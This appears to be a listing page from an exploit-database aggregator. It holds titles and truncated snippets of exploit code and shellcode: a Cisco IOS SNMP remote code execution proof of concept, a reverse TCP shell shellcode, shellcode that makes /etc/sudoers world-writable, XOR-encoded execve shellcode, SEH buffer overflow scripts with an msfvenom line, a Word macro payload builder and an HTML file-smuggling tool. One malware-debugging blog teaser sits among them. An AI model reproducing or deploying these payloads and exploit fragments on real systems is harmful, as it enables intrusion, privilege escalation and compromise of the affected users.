Cisco IOS - Remote Code Execution

!/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution =================== This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco Systems on June 29th 2017 - Descriptio...

Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)

Linux/x86 - Reverse TCP 127.1.1.1:8888/TCP Shell /bin/sh + Null-Free Shellcode 67/69 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - Reverse TCP Shell /bin/sh 127.1.1.1:8888/TCP Null-Free Shellcode 69 bytes Description: Smallest /bin/sh Reverse TCP ShellcodeNull Free, No...

Debugging Complex Malware that Executes Code on the Heap

Introduction In this blog, I will share a simple debugging tactic for creating “save points” during iterative remote debugging of complex multi-stage samples that execute code in heap memory at non-deterministic addresses. I’ll share two examples: one contrived, and the other a complex, modular...

Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)

Linux/x86 - chmod 777 /etc/sudoers Shellcode 36 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : chmod 777 /etc/sudoers - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : chmod /etc/sudoers permissio...

PT-2018-19371

Name of the Vulnerable Software and Affected Versions SC version 7.16 Description A stack-based buffer overflow allows local attackers to execute arbitrary code by providing oversized input that exceeds buffer boundaries. By crafting malicious input strings larger than 1052 bytes, an attacker can...

Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)

Linux/x64 - Custom Encoded XOR + Polymorphic + execve/bin/sh Shellcode Generator. Shellcode exploit for Generator platform !/usr/bin/python from random import randint encoded = "" encoded2 = "" badchars = 0x00 shellcode = "\x90" +...

Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode

Linux/x64 - Custom Encoded XOR + execve/bin/sh Shellcode. Shellcode exploit for Linuxx86-64 platform global start section .text start: jmp findaddress ; jmp short by default decoder: ; Get the address of the string pop rdi push rdi pop rbx ; get the first byte and bruteforce till you get the toke...

MS-Word Payload Delivery: Macro Creator

Invoke-MacroCreator is a powershell Cmdlet that allows for the creation of an MS-Word document embedding a VBA macro with various payload delivery and execution capabilities. Description Basically the script supports three types of payload that you MUST specify using the -t argument: 1. shellcode...

LabF nfsAxe FTP Client 3.7 - Remote Buffer Overflow (DEP Bypass)

!/usr/bin/env python Exploit Title : LabF nfsAxe 3.7 FTP Client DEP Bypass Date : 12/8/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html Software link : http://www.labf.com/download/nfsaxe.exe Version : 3.7 Tested on : Windows 7 x86 Description : Upon...

LabF nfsAxe FTP Client 3.7 - Remote Buffer Overflow (DEP Bypass)

LabF nfsAxe FTP Client 3.7 - Remote Buffer Overflow DEP Bypass !/usr/bin/env python Exploit Title : LabF nfsAxe 3.7 FTP Client DEP Bypass Date : 12/8/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html Software link : http://www.labf.com/download/nfsaxe.exe...

LabF nfsAxe FTP Client 3.7 Buffer Overflow

!/usr/bin/env python Exploit Title : LabF nfsAxe 3.7 FTP Client DEP Bypass Date : 12/8/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html Software link : http://www.labf.com/download/nfsaxe.exe Version : 3.7 Tested on : Windows 7 x86 Description : Upon...

SocuSoft Co. Photo 2 Video Converter 8.0.0 Code Execution / DoS Exploit

SocuSoft Co. Photo 2 Video Converter Free and Pro variants version 8.0.0 suffer from a buffer overflow in the pdmlog.dll library. ================================================================================= | | | | | | | | | | | |/' | / / / / | ' | /| | ' \ \ / | '| \ \ \ /\ / / | | | \ |/ /...

Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow

Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow Exploit Title: Socusoft Photo 2 Video Converter v8.0.0 Local Buffer Overflow Free and Professional variants Date: 01/12/2017 Exploit Author: Jason Magic ret2eax Vendor Homepage: www.socusoft.com Version: 8.0.0 Tested on: Windows Serve...

Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow

Exploit Title: Socusoft Photo 2 Video Converter v8.0.0 Local Buffer Overflow Free and Professional variants Date: 01/12/2017 Exploit Author: Jason Magic ret2eax Vendor Homepage: www.socusoft.com Version: 8.0.0 Tested on: Windows Server 2008 R2 Socusoft's Photo 2 Video Converter v8.0.0 Free and...

Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH)

!/usr/bin/python import struct Exploit Author: Miguel Mendez Z Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode Date: 29-11-2017 Software: Dup Scout Enterprise Version: v10.0.18 Vendor Homepage: http://www.dupscout.com Software Link:...

Dup Scout Enterprise 10.0.18 - Input Directory Local Buffer Overflow (SEH)

Dup Scout Enterprise 10.0.18 - Input Directory Local Buffer Overflow SEH !/usr/bin/python import struct Exploit Author: Miguel Mendez Z Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode Date: 29-11-2017 Software: Dup Scout Enterprise Version:...

Microsoft Windows 10 Creators Update version 1703 - Kernel Local Privilege Escalation Exploit

Microsoft Windows 10 Creators Update version 1703 x86 - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation / EDB Note Source https://gist.github.com/xpn/736daa4d1ff7b9869f4b3d1e9a34d315/ff2e2465d4a07588d0148dc87e77b17b41ef9d1d Source...

ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)

!/usr/bin/python Tested on: Windows 10 Professional x86 Exploit for previous version: https://www.exploit-db.com/exploits/42455/ Seems they haven't patched the vulnerability at all :D msfvenom -p windows/exec CMD="calc.exe" -e x86/unicodemixed BufferRegister=EAX -f python shellcode = "" shellcode...

EmbedInHTML - Embed and hide any file in an HTML file

What this tool does is taking a file any type of file, encrypt it, and embed it into an HTML file as ressource, along with an automatic download routine simulating a user clicking on the embedded ressource. Then, when the user browses the HTML file, the embedded file is decrypted on the fly, save...

Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)

Linux/x64 - Egghunter 0xbeefbeef Shellcode 34 bytes. Shellcode exploit for Linuxx86-64 platform global start section .text start: xor rsi,rsi push rsi ; starts the search at position 0 pop rdi nextpage: or di,0xfff inc rdi next4bytes: push 21 pop rax syscall cmp al,0xf2 jz nextpage mov...